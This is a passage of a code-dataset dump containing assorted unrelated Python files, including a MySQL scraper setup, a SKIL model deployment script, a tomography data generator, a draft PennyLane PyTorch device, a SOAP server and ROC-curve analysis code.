pymysql.connect(\"localhost\", \"root\", \"123456\", \"pyData\")\n\n    cursor = db.cursor()\n    # If the table already exists, drop it with execute()\n    cursor.execute(\"DROP TABLE IF EXISTS dmlist\")\n\n    # SQL statement that creates the table\n    sql = \"\"\"CREATE TABLE dmlist (\n             ID integer (255) NOT NULL AUTO_INCREMENT primary key,\n             dmurl varchar (255),\n             title varchar (255)\n             )\"\"\"\n\n    cursor.execute(sql)\n\n    # Close the database connection\n    db.close()\n\ndef main():\n    base_url = \"http://www.fengchedm.com/paiming/137.html\"\n    bookspider = bookSpider(base_url)\n    bookspider.getHtml()\nif __name__ == '__main__':\n    main()","sub_path":"booktest.py","file_name":"booktest.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"502802980","text":"import pprint\nimport unittest\n\nimport numpy\nimport skil_client\nfrom skil_client import *\nfrom skil_client.rest import ApiException\n\ndebug = False\n\nhost = \"localhost\"  # Rename this to the host you are using \n\nconfig = Configuration()\nconfig.host = \"{}:9008\".format(host)  # change this if you're using a different port number for the general API!\nconfig.debug = debug\napi_client = ApiClient(configuration=config)\n# create an instance of the API class\napi_instance = skil_client.DefaultApi(api_client=api_client)\n\nconfig_mh = Configuration()\nconfig_mh.host = \"{}:9100\".format(host)  # change this if you're using a different port number for the model server!\nconfig_mh.debug = debug\napi_client_mh = ApiClient(configuration=config_mh)\n# create an instance of the Model History API class\napi_instance_mh = skil_client.DefaultApi(api_client=api_client_mh)\n\n# authenticate\npp = pprint.PrettyPrinter(indent=4)\ntry:\n    print(\"Authenticating with SKIL API...\")\n    credentials = skil_client.Credentials(user_id=\"admin\", password=\"admin\")  # Update this with the ID and password you're using for your SKIL server\n    token = api_instance.login(credentials)\n    pp.pprint(token)\n    # add credentials to config\n    config.api_key['authorization'] = token.token\n    config.api_key_prefix['authorization'] = \"Bearer\"\n    # for model history\n    config_mh.api_key['authorization'] = token.token\n    config_mh.api_key_prefix['authorization'] = \"Bearer\"\nexcept ApiException as e:\n    print(\"Exception when calling DefaultApi->login: %s\\n\" % e)\n\nprint(\"Uploading model, please wait...\")\nmodelFile = \"/model.pb\"\nuploads = api_instance.upload(file=modelFile)\npp.pprint(uploads)\n\nmodel_file_path = \"file://\" + uploads.file_upload_response_list[0].path\npp.pprint(model_file_path)\n\ndeployment_name = \"mnist\"\ncreate_deployment_request = CreateDeploymentRequest(deployment_name)\ndeployment_response = api_instance.deployment_create(create_deployment_request)\n\npp.pprint(deployment_response)\n\nmodel_name = \"tf_model_mnist\"\nuris = [\"{}/model/{}/default\".format(deployment_name, model_name),\n        \"{}/model/{}/v1\".format(deployment_name, model_name)]\n\ndeploy_model_request = ImportModelRequest(model_name,\n                                          1, \n                                          file_location=model_file_path,\n                                          model_type=\"model\",\n                                          uri=uris,\n                                          input_names=[\"input_node\", \"keep_prob_input\"], \n                                          output_names=[\"output_node\"])\n\nmodel_deployment_response = api_instance.deploy_model(deployment_response.id, deploy_model_request)\npp.pprint(model_deployment_response)\n\nmodel_state_change_response = api_instance.model_state_change(deployment_response.id,\n                                                              model_deployment_response.id,\n                                                              SetState(\"start\"))\npp.pprint(model_state_change_response)\n\nimport time\n
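# The loop below doubles as a status probe: it re-issues SetState(\"start\") every five seconds\n# and reads back the returned .state field, exiting once the model server reports \"started\".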
\n# Checking if the model is already started\nprint(\"\\nStart serving model...\")\nwhile True:\n    time.sleep(5)\n    \n    # Query the model state\n    model_state = api_instance.model_state_change(deployment_response.id, \n                                                  model_deployment_response.id, \n                                                  SetState(\"start\")).state\n    \n    if model_state == \"started\":\n        print(\"Model server started successfully!\")\n        break\n    else:\n        print(\"wait...\")\n","sub_path":"Docker-deployment/docker/deploy_model.py","file_name":"deploy_model.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"631916194","text":"# from torch import im\n\n\ndef weights_init(module):\n    classname = module.__class__.__name__\n    if classname.find('Conv') != -1:\n        module.weight.data.normal_(0.0, 0.1)\n    elif classname.find('Linear') != -1:\n        module.weight.data.normal_(0.0, 0.1)\n        module.bias.data.fill_(0.0)\n\n\ndef model_weights_init(model):\n    for module in model.modules():\n        weights_init(module)\n\n\n","sub_path":"LearnDistance/with_augmentation/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"522152036","text":"def pale(n):\n    n_string = str(n)  # convert the provided number into a string\n    fourdigits = len(n_string) == 4  # with the string version of the input, determine if the value indeed has 4 digits\n    rem = n % 10  # use modulo to extract the last digit\n    divisible = rem % 4 == 0 and rem != 0  # determine if the last digit of the input is divisible by 4 and not 0\n    n = int(n / 10)\n    rem1 = n % 10\n    n = int(n / 10)\n    rem2 = n % 10\n    n = int(n / 10)\n    rem3 = n % 10\n    n = int(n / 10)\n    rem4 = n % 10  # repeatedly separate each of the remaining four digits one by one\n    threethree = (rem == 3 and rem1 == 3) or (rem1 == 3 and rem2 == 3) or (rem2 == 3 and rem3 == 3) or (rem3 == 3 and rem4 == 3)  # verify whether any two consecutive digits are each equal to 3\n    pale_verification = (threethree != divisible == fourdigits) or (fourdigits == threethree != divisible)  # determine if the results amount to a pale or not\n    return pale_verification  # output the determination\n","sub_path":"Pale_Function.py","file_name":"Pale_Function.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"329966968","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 11 18:03:26 2020\n\n@author: milly\n\"\"\"\n\nimport numpy as np\nfrom tomophantom import TomoP2D \nfrom tomophantom.TomoP2D import Objects2D\nimport astra\nimport os\n\nnum_gen = 1000\n\n#make this automatic\ntrainset = 3\nmin_obs = 5\nmax_obs = 30\n\nsinogram_folder = \"sinograms\"\nphantom_folder = \"phantoms\"\n\ntrainset_list = list(filter(lambda x: \"sinograms\" in x, os.listdir(os.getcwd())))\ntrainset_list = list(map(lambda x: int(x.split(\"_\")[-1]), trainset_list))\nwhile trainset in trainset_list:\n    trainset += 1\n    \nroot_dir = os.getcwd()\n\nsinogram_folder = os.path.join(root_dir, sinogram_folder + \"_{}_{}_{}\".format(min_obs, max_obs, trainset))\nphantoms_folder = os.path.join(root_dir, phantom_folder + \"_{}_{}_{}\".format(min_obs, max_obs, trainset))\nos.mkdir(sinogram_folder)\nos.mkdir(phantoms_folder)\n\nsino_name = \"sino_{}\"\nphantom_name = \"ground_{}\"\n\n#keeps the generated objects within a circle with a diameter 90% of the \nwidth = 0.9\n\nnum_objects = np.random.randint(min_obs, max_obs)\nob_list = np.empty(num_objects, dtype=dict)\n\nfor i 
in range(num_gen):\n print(i)\n for ob_index in range(num_objects):\n \n density = np.random.rand()\n shape = [Objects2D.ELLIPSE, Objects2D.RECTANGLE][np.random.randint(0,2)]\n \n if shape == Objects2D.ELLIPSE:\n R = width\n x = np.random.rand() * 2 - 1\n y = np.random.rand() * 2 - 1\n while x**2 + y**2 > R ** 2:\n x = np.random.rand() * 2 - 1\n y = np.random.rand() * 2 - 1\n max_length = R - (x**2 + y**2) ** 0.5\n long_length = np.random.rand() * max_length\n short_length = np.random.rand() * long_length\n \n if shape == Objects2D.RECTANGLE:\n R = width/2\n x = np.random.rand() * 2\n y = np.random.rand() * 2\n while x**2 + y**2 > R ** 2:\n x = np.random.rand() * 2\n y = np.random.rand() * 2\n max_length = R - (x**2 + y**2) ** 0.5\n max_length *= 4/(2**0.5)\n long_length = np.random.rand() * max_length\n short_length = np.random.rand() * long_length\n \n rot = np.random.randint(0, 360)\n ob = {'Obj': shape,\n 'C0' : density,\n 'x0' : x,\n 'y0' : y,\n 'a' : long_length,\n 'b' : short_length,\n 'phi': rot}\n \n ob_list[ob_index] = ob\n \n #make these choices\n phantom = TomoP2D.Object(1499, ob_list)\n \n vol_geom = astra.creators.create_vol_geom(1499, 1499, -256, 256, -256, 256)\n proj_geom = astra.creators.create_proj_geom('parallel',1, \n 512, np.linspace(0, np.pi, 512, False))\n proj_id = astra.create_projector(\"cuda\",proj_geom,vol_geom)\n vol_geom_rec = astra.create_vol_geom(512,512)\n sino_id, sinogram = astra.create_sino(phantom,proj_id, gpuIndex=1)\n \n np.save(os.path.join(phantoms_folder, phantom_name.format(i)), phantom)\n np.save(os.path.join(sinogram_folder, sino_name.format(i)), sinogram)\n","sub_path":"new_rand_set.py","file_name":"new_rand_set.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406078987","text":"from __future__ import unicode_literals\n\nfrom re_scan import Scanner\n\n\nscanner = Scanner([\n ('bold', r'\\*\\*'),\n ('link_special', r'\\[\\[(?P.*?)\\|(?P.*?)\\]\\]'),\n ('link', r'\\[\\[(.*?)\\]\\]'),\n ('underline', r'_'),\n])\n\ninput_text = 'Hello **World**! 
[[Stuff|extra]] _[[Stuff]]_.'\n\nfor token, match in scanner.scan_with_holes(input_text):\n if token is None:\n print('hole', match)\n else:\n print('token', (token, match.groups(),\n match.groupdict(), match.group()))\n","sub_path":"examples/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"158526209","text":"'''\n#40 Combination Sum II\nGiven a collection of candidate numbers (C) and a target number (T), find all unique combinations in C where the candidate numbers sums to T.\n\nEach number in C may only be used once in the combination.\n\nNote:\nAll numbers (including target) will be positive integers.\nThe solution set must not contain duplicate combinations.\nFor example, given candidate set [10, 1, 2, 7, 6, 1, 5] and target 8, \nA solution set is: \n[\n [1, 7],\n [1, 2, 5],\n [2, 6],\n [1, 1, 6]\n]\n'''\nclass Solution(object):\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n res = list()\n if len(candidates) == 0:\n return res\n candidates.sort()\n i = 0\n while i < len(candidates):\n if i > 0 and candidates[i] == candidates[i-1]: #skip the duplicate one\n i += 1\n continue\n candi = candidates[i]\n if candi > target:\n break\n if candi == target:\n temp = [candi]\n res.append(temp)\n break\n \n temp_list =list()\n temp_list.append(candi)\n temp_target = target - candi\n temp_res = self.combinationSum2(candidates[i+1:],temp_target)\n for item in temp_res:\n temp = temp_list + item\n res.append(temp)\n i += 1\n return res\n ","sub_path":"Algorithms/N40-Combination Sum2.py","file_name":"N40-Combination Sum2.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219877633","text":"import codecs\n\nfile = codecs.open(\"TDK_kelimeler_anlamlar_ceviriler.txt\", \"r\")\n\nkac_tek_kelime = 0\n\ntr_kelimeler = []\n\nfor satir in file:\n \n parcali_satir = satir.split(\";;\")\n tr_kelime = parcali_satir[0]\n en_kelime = parcali_satir[2]\n tr_anlami = parcali_satir[1]\n \n tr_kelime_lower = tr_kelime.lower()\n en_kelime_lower = en_kelime.lower()\n \n def non_turkish(_nt_string):\n \n return _nt_string.replace(\"ç\", \"c\").replace(\"ğ\", \"g\").replace(\"ş\",\"s\").replace(\"ü\",\"u\").replace(\"ö\",\"o\").replace(\"ı\",\"i\").replace(\"â\",\"a\").replace(\"î\",\"i\").replace(\"û\",\"u\").replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n \n tr_kelime_lower_edited = non_turkish(tr_kelime_lower)\n en_kelime_lower_edited = non_turkish(en_kelime_lower)\n \n \n \n if \" \" in en_kelime:\n \n continue\n \n else:\n \n if tr_kelime_lower_edited == en_kelime_lower_edited:\n \n continue\n \n else:\n \n if \"\\\"\" in en_kelime:\n \n continue\n \n else:\n \n if not \"if\" == en_kelime[:2]:\n \n if not \"don't\" == en_kelime[:5]:\n \n if not \"does'\" == en_kelime[:5]:\n \n satir_kelime_anlam_en = \"%s;;%s;;%s\" % (tr_kelime, tr_anlami, en_kelime)\n satir_kelime_anlam_en = satir_kelime_anlam_en.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n \n if tr_kelime not in tr_kelimeler: \n \n kac_tek_kelime += 1\n \n tr_kelimeler.append(tr_kelime)\n \n print(satir_kelime_anlam_en, file=codecs.open(\"TDK_tek_kelimeler_anlamlar_cevriler.txt\", 
\"a\"))","sub_path":"apptrogren/just_one_words.py","file_name":"just_one_words.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626524369","text":"# -*- coding: utf-8 -*-\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport time\nimport os\nimport sys\n\nif sys.version_info[0] == 3:\n import urllib.request\nelse:\n import urllib\n# http://stackoverflow.com/questions/17960942/attributeerror-module-object-has-no-attribute-urlretrieve\n\n\nfrom ..drivers import Oscillo, Spectrum\nfrom .oscillo_widget import OscilloWidget\nfrom .spectrum_widget import SpectrumWidget\nfrom .connect_widget import ConnectWidget\nfrom koheron import connect\n\nclass WelcomeWidget(QtGui.QWidget):\n \"\"\" This widget allows to connect to one of the available drivers.\n \"\"\"\n def __init__(self, parent, ip_path):\n super(WelcomeWidget, self).__init__()\n\n self.parent = parent\n self.app_list = self.parent.app_list\n self.instrument_list = [''] * len(self.app_list)\n\n self.ip_path = ip_path\n self.opened = True\n self.select_opened = True\n\n # Define layouts\n self.lay = QtGui.QHBoxLayout()\n self.left_layout = QtGui.QVBoxLayout()\n self.right_layout = QtGui.QVBoxLayout()\n\n # Connection (ip address and password)\n self.connect_layout = QtGui.QVBoxLayout()\n self.connect_widget = ConnectWidget(self, self.ip_path)\n self.connect_layout.addWidget(self.connect_widget)\n\n # Select between drivers\n self.drivers_layout = QtGui.QVBoxLayout()\n\n self.app_buttons = []\n for i, app in enumerate(self.instrument_list):\n self.app_buttons.append(self.set_button(''))\n self.drivers_layout.addWidget(self.app_buttons[i], 1, QtCore.Qt.AlignCenter)\n def make_callback(i):\n return lambda : self.app_onclick(i)\n self.app_buttons[i].clicked.connect(make_callback(i))\n self.update_buttons()\n\n # Right layout\n self.right_layout.addLayout(self.connect_layout)\n self.right_layout.addLayout(self.drivers_layout)\n self.right_layout.addStretch(1)\n self.right_frame = QtGui.QFrame(self)\n self.right_frame.setFrameShape(QtGui.QFrame.StyledPanel)\n self.right_frame.setLayout(self.right_layout)\n\n # Add layouts to main layout\n self.lay.addLayout(self.left_layout, 1)\n self.lay.addWidget(self.right_frame)\n self.setLayout(self.lay)\n\n def update(self):\n pass\n\n def set_button(self, name):\n button = QtGui.QPushButton(name)\n button.setStyleSheet('QPushButton {color: green;}')\n button.setFixedWidth(200)\n button.setFixedHeight(150)\n return button\n\n def update_buttons(self):\n for i, button in enumerate(self.app_buttons):\n button.setText(self.parent.app_list[i].capitalize() +\n (' not available ' if (self.instrument_list[i] == '') else ''))\n\n def app_onclick(self, app_idx):\n app = self.app_list[app_idx]\n instrument = self.instrument_list[app_idx]\n if instrument != '':\n QtGui.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))\n self.connect_widget.client = connect(self.connect_widget.host, name=instrument)\n driver = globals()[app.capitalize()](self.connect_widget.client)\n driver.init()\n QtGui.QApplication.restoreOverrideCursor()\n index = self.parent.stacked_widget.addWidget(globals()[app.capitalize()+'Widget'](driver, self.parent))\n self.parent.stacked_widget.setCurrentIndex(index)\n","sub_path":"ldk/gui/welcome_widget.py","file_name":"welcome_widget.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"522466984","text":"import logging\r\nimport inspect\r\nimport os\r\nimport functools\r\nimport time\r\n\r\n\r\nclass EndOfNameFilter(logging.Filter):\r\n    def filter(self, record):\r\n        record.trunc_name = record.name[-35:]\r\n        return True\r\n\r\n\r\ndef get_logger(name=None, logging_format=None):\r\n    if not logging_format:\r\n        json_logging_format = \"\"\"{\"class_name\": \"%(name)s\", \"time\": \"%(asctime)s\", \"level\": \"%(levelname)s\", \"message\": \"%(message)s\"}\"\"\"\r\n        logging_format = (\r\n            \"%(trunc_name)35.35s - %(asctime)-15s - %(levelname)5.5s: %(message)s\"\r\n        )\r\n    if not name:\r\n        name = os.path.basename(inspect.stack()[1].filename)\r\n    logger = logging.getLogger(name)\r\n    if not logger.handlers:\r\n        sh = logging.StreamHandler()\r\n        sh.setFormatter(logging.Formatter(logging_format))\r\n        logger.addHandler(sh)\r\n        sh.addFilter(EndOfNameFilter())\r\n    logger.setLevel(logging.INFO)\r\n    logger.propagate = False\r\n    return logger\r\n\r\n\r\ndef logger_wrapper(func):\r\n    @functools.wraps(func)\r\n    def wrapped(*args, **kwargs):\r\n        if hasattr(func, \"__self__\"):\r\n            if func.__self__.logger_level != \"off\":\r\n                func.__self__.logger.debug(\r\n                    \"{func.__qualname__!s} called with arguments: {a}, and kwargs: {k}\".format(\r\n                        func=func,\r\n                        a=\", \".join([str(a) for a in args]),\r\n                        k=\", \".join(kwargs),\r\n                    )\r\n                )\r\n                time0 = time.time()\r\n                func_out = func(*args, **kwargs)\r\n                func.__self__.logger.debug(\"Function returned %s\", func_out)\r\n                func.__self__.logger.debug(\r\n                    \"Took %ss to execute\", round(time.time() - time0, 3)\r\n                )\r\n                return func_out\r\n            else:\r\n                return func(*args, **kwargs)\r\n        else:\r\n            return func(*args, **kwargs)\r\n\r\n    return wrapped\r\n\r\n\r\nclass test:\r\n    def __init__(self, logger):\r\n        self.logger = logger\r\n        self.logger_level = \"DEBUG\"\r\n        self.debug = True\r\n        if self.debug:\r\n            self.wrap_debug()\r\n\r\n    def wrap_debug(self):\r\n        for k in self.__dir__():\r\n            v = getattr(self, k)\r\n            if callable(v) and hasattr(v, \"__self__\"):  # only bound methods\r\n                setattr(self, k, logger_wrapper(v))\r\n\r\n    def poop(self, h):\r\n        time.sleep(1)\r\n        return h + 1\r\n","sub_path":"src/fast_krig/_log/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"436854734","text":"import numpy as np\nfrom pennylane.operation import DiagonalOperation\nfrom . import torch_ops\nfrom . import DefaultQubit\nimport torch\n\n#code to check the pytorch version
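\n# A minimal sketch of the check the TODO above asks for; the 1.8 minimum is an assumption, not a\n# documented requirement (torch.__version__ is a real attribute on all recent releases).\n_torch_version = tuple(int(p) for p in torch.__version__.split(\".\")[:2])\nif _torch_version < (1, 8):\n    raise ImportError(\"default.qubit.torch requires torch>=1.8\")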
\n\nclass DefaultQubitTorch(DefaultQubit):\n    \"\"\"Simulator plugin based on ``\"default.qubit\"``, written using PyTorch.\n\n    **Short name:** ``default.qubit.torch``\n\n    This device provides a pure-state qubit simulator written using PyTorch.\n    As a result, it supports classical backpropagation as a means to compute the Jacobian. This can\n    be faster than the parameter-shift rule for analytic quantum gradients\n    when the number of parameters to be optimized is large.\n\n    To use this device, you will need to install PyTorch:\n\n    .. code-block:: console\n\n        pip install torch\n\n    **Example**\n\n    The ``default.qubit.torch`` is designed to be used with end-to-end classical backpropagation\n    (``diff_method=\"backprop\"``) with the PyTorch interface. This is the default method\n    of differentiation when creating a QNode with this device.\n\n    Using this method, the created QNode is a 'white-box', and is\n    tightly integrated with your PyTorch computation:\n\n    >>> dev = qml.device(\"default.qubit.torch\", wires=1)\n    >>> @qml.qnode(dev, interface=\"torch\", diff_method=\"backprop\")\n    ... def circuit(x):\n    ...     qml.RX(x[1], wires=0)\n    ...     qml.Rot(x[0], x[1], x[2], wires=0)\n    ...     return qml.expval(qml.PauliZ(0))\n    >>> weights = torch.tensor([0.2, 0.5, 0.1], requires_grad=True)\n    >>> res = circuit(weights)\n    >>> res.backward()\n    >>> print(weights.grad)\n    tensor([-2.2527e-01, -1.0086e+00,  1.3878e-17])\n\n    A scalar cost built on top of the QNode differentiates the same way:\n\n    >>> def cost(weights):\n    ...     return torch.sum(circuit(weights) ** 3) - 1\n    >>> weights = torch.tensor([0.2, 0.5, 0.1], requires_grad=True)\n    >>> res = cost(weights)\n    >>> res.backward()\n    >>> print(weights.grad)\n    tensor([-3.5472e-01, -1.5883e+00,  3.4694e-17])\n\n    There are a couple of things to keep in mind when using the ``\"backprop\"``\n    differentiation method for QNodes:\n\n    * You must use the ``\"torch\"`` interface for classical backpropagation, as PyTorch is\n      used as the device backend.\n\n    * Only exact expectation values, variances, and probabilities are differentiable.\n      When instantiating the device with ``analytic=False``, differentiating QNode\n      outputs will result in ``None``.\n\n\n    If you wish to use a different machine-learning interface, or prefer to calculate quantum\n    gradients using the ``parameter-shift`` or ``finite-diff`` differentiation methods,\n    consider using the ``default.qubit`` device instead.\n\n\n    Args:\n        wires (int, Iterable[Number, str]): Number of subsystems represented by the device,\n            or iterable that contains unique labels for the subsystems as numbers (i.e., ``[-1, 0, 2]``)\n            or strings (``['ancilla', 'q1', 'q2']``). Default 1 if not specified.\n\n        shots (None, int): How many times the circuit should be evaluated (or sampled) to estimate\n            the expectation values. 
Defaults to ``None`` if not specified, which means\n            that the device returns analytical results.\n            If ``shots > 0`` is used, the ``diff_method=\"backprop\"``\n            QNode differentiation method is not supported and it is recommended to consider\n            switching device to ``default.qubit`` and using ``diff_method=\"parameter-shift\"``.\n    \"\"\"\n\n    name = \"Default qubit (PyTorch) Pennylane plugin\"\n    short_name = \"default.qubit.torch\"\n    pennylane_requires = '2'\n    version = '0.0.1'\n    author = 'Abhinav M Hari and Daniel Wang'\n\n    # parametric gates come from torch_ops (torch itself has no RX, CRZ, etc.)\n    parametric_ops = {\n        \"PhaseShift\": torch_ops.PhaseShift,\n        \"ControlledPhaseShift\": torch_ops.ControlledPhaseShift,\n        \"RX\": torch_ops.RX,\n        \"RY\": torch_ops.RY,\n        \"RZ\": torch_ops.RZ,\n        \"Rot\": torch_ops.Rot,\n        \"MultiRZ\": torch_ops.MultiRZ,\n        \"CRX\": torch_ops.CRX,\n        \"CRY\": torch_ops.CRY,\n        \"CRZ\": torch_ops.CRZ,\n        \"CRot\": torch_ops.CRot,\n        \"SingleExcitation\": torch_ops.SingleExcitation,\n        \"SingleExcitationPlus\": torch_ops.SingleExcitationPlus,\n        \"SingleExcitationMinus\": torch_ops.SingleExcitationMinus,\n        \"DoubleExcitation\": torch_ops.DoubleExcitation,\n        \"DoubleExcitationPlus\": torch_ops.DoubleExcitationPlus,\n        \"DoubleExcitationMinus\": torch_ops.DoubleExcitationMinus,\n    }\n\n    C_DTYPE = torch.complex128\n    R_DTYPE = torch.float64\n    _asarray = staticmethod(torch.tensor)\n    _dot = staticmethod(lambda x, y: torch.tensordot(x, y, dims=1))  # torch.tensordot takes dims, not dim\n    _abs = staticmethod(torch.abs)\n    _reduce_sum = staticmethod(torch.sum)  # torch.sum plays the role of tf.reduce_sum\n    _reshape = staticmethod(torch.reshape)\n    _flatten = staticmethod(lambda tensor: torch.reshape(tensor, (-1,)))  # flatten to 1-D\n    _gather = staticmethod(torch.gather)\n    _einsum = staticmethod(torch.einsum)\n    _cast = staticmethod(torch.tensor)  # also check the torch.Tensor.to method\n    _transpose = staticmethod(torch.transpose)\n    _tensordot = staticmethod(torch.tensordot)\n    _conj = staticmethod(torch.conj)\n    _imag = staticmethod(torch.imag)\n    _roll = staticmethod(torch.roll)\n    _stack = staticmethod(torch.stack)  # same role as tf.stack\n\n    def __init__(self, wires=1, shots=None, hardware_options=None):\n        # __init__ must not be a staticmethod; analytic results are returned when shots is None\n        super().__init__(wires=wires, shots=shots, analytic=(shots is None))\n        self.hardware_options = hardware_options\n\n\n    @classmethod\n    def capabilities(cls):\n        capabilities = super().capabilities().copy()\n        capabilities.update(\n            passthru_interface=\"torch\",\n            supports_reversible_diff=False\n        )\n        return capabilities\n\n    # TODO: a _scatter static method is still missing here\n    def _get_unitary_matrix(self, unitary):\n        \"\"\"Return the matrix representing a unitary operation.\n\n        Args:\n            unitary (~.Operation): a PennyLane unitary operation\n\n        Returns:\n            torch.tensor[complex] or array[complex]: Returns a 2D matrix representation of\n            the unitary in the computational basis, or in the case of a diagonal unitary,\n            a 1D array representing the matrix diagonal. For non-parametric unitaries,\n            the return type will be a ``np.ndarray``. 
For parametric unitaries, a ``torch.tensor``\n            object will be returned.\n        \"\"\"\n        op_name = unitary.name.split(\".inv\")[0]\n\n        if op_name in self.parametric_ops:\n            if op_name == \"MultiRZ\":  # must match the dict key exactly; \"MultiRz\" would never hit\n                mat = self.parametric_ops[op_name](*unitary.parameters, len(unitary.wires))\n            else:\n                mat = self.parametric_ops[op_name](*unitary.parameters)\n\n            if unitary.inverse:\n                mat = self._transpose(self._conj(mat))\n\n            return mat\n\n        if isinstance(unitary, DiagonalOperation):\n            return unitary.eigvals\n\n        return unitary.matrix\n","sub_path":"pennylane/devices/default_qubit_torch.py","file_name":"default_qubit_torch.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"419998526","text":"from pysimplesoap.server import SoapDispatcher, SOAPHandler, WSGISOAPHandler\nimport logging\nimport const\nfrom BaseHTTPServer import HTTPServer\ndispatcher = SoapDispatcher(\n'TransServer',\nlocation = \"http://%s:8050/\" % const.TARGET_IP,\naction = 'http://%s:8050/' % const.TARGET_IP, # SOAPAction\nnamespace = \"http://example.com/sample.wsdl\", prefix=\"ns0\",\ntrace = True,\nns = True)\n\ndef on():\n    return \"on\"\ndef off():\n    return \"off\"\n\ndef status():\n    return \"1024\"\n\n# register the user functions\n\ndispatcher.register_function('on', on,\n    args={},\n    returns={'result': str} \n    )\n\ndispatcher.register_function('off', off,\n    args={},\n    returns={'result': str} \n    )\n\ndispatcher.register_function('status', status,\n    args={},\n    returns={'humidity': str} \n    )\n\nlogging.info(\"Starting server...\")\nhttpd = HTTPServer((\"\", 8050),SOAPHandler)\nhttpd.dispatcher = dispatcher\nhttpd.serve_forever()\n\n","sub_path":"http_server_soap.py","file_name":"http_server_soap.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"8507460","text":"import ride, car, readFile, router\r\n\r\n# --------------------------------------------\r\n# Input File with Rides\r\n\r\ninputFile = 'test.in' #'b_should_be_easy.in'\r\n\r\nrides = readFile.getRides(inputFile)\r\nparameters = readFile.getParameters(inputFile)\r\n\r\nRouter = router.Router()\r\n\r\ncarList = []\r\n\r\nfor i in range (parameters[\"vehicles\"]):\r\n    carList.append (car.Car(i))\r\n    print(carList[len(carList)-1].id)\r\n\r\nprint(\"List populated\")\r\n\r\nfor j in range (parameters[\"steps\"]):\r\n    for current_car in carList:\r\n        if (current_car.carActive):\r\n            current_car.moveCar()\r\n\r\n    for current_ride in rides:\r\n        print(\"ride_loop\")\r\n        if (not current_ride.assigned()):\r\n            Router.assignCar(current_ride, carList)\r\n\r\nfor vehicle in carList:\r\n    print (vehicle.currentLocationX)  # use the loop variable, not the leftover current_car\r\n    print (vehicle.currentLocationY)\r\n    print (\"\")\r\n\r\n# Create rides in for loop\r\n# Store in List\r\n\r\n# Loop through each ride, Loop through available cars\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"187420230","text":"import json\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nimport time\nimport argparse\n\ndef ROC_Data(T0, Tf, N, stat):\n\n    with open(\"all_dir/run_uniques/essentials.json\", \"r\") as f:\n        essentials = json.load(f)\n    AFG_PAIR = essentials[\"essentials\"][6]\n    trials = essentials[\"essentials\"][7]\n
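    # Expected layout of Merged_Peaks.json, inferred from the indexing below (not documented in the\n    # source): RHO_MOD[trial][0][stat][j] holds the off-source statistic samples for parameter-space\n    # point j, while RHO_MOD[trial][1][stat] holds the on-source peak values for that trial.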
\n    with open(\"all_dir/Merged_jsons/Merged_Peaks.json\", \"r\") as f:\n        RHO_MOD = json.load(f)\n\n    PSPACE_LEN = len(AFG_PAIR)\n\n    # Stats per threshold\n    Detection_Prob = []\n    New_False_Prob = []\n\n    # sets current threshold value\n    for thrshld in np.linspace(T0, Tf, N):\n\n        # Detection / False Alarm probability counters\n        Detect_count = 0\n        False_count = 0\n\n        # loops over trial / parameter-space pairs \n        for i in range(trials):\n\n            # Detection Probability\n            Max_FG_ij = max(RHO_MOD[str(i)][1][stat])  # max of onsources per trial\n            if Max_FG_ij > thrshld:\n                Detect_count += 1\n\n            for j in range(PSPACE_LEN):\n\n                RM_ij = np.array(RHO_MOD[str(i)][0][stat][j])\n\n                # False Alarm probability\n                falses_ij = len(RM_ij[RM_ij > thrshld])\n                False_count += falses_ij\n\n        # Detection/False Alarm probability stats\n        # NOTE: i below is the index left over from the trial loop above; this relies on every\n        # trial having the same number of off-source samples per parameter-space point.\n        Detect_stat = Detect_count / trials\n        False_stat = False_count / (len(RHO_MOD[str(i)][0][stat][0]) * PSPACE_LEN * trials)\n\n        # Appending stat per threshold\n        Detection_Prob.append(Detect_stat)\n        New_False_Prob.append(False_stat)\n    \n    return(Detection_Prob, New_False_Prob)\n\ndef ROC_Curve(N, outputfile=\"ROC_test\"):\n    \n    with open(\"all_dir/run_uniques/essentials.json\", \"r\") as f:\n        essentials = json.load(f)\n    stat_list = essentials[\"essentials\"][8]\n\n    \n    with 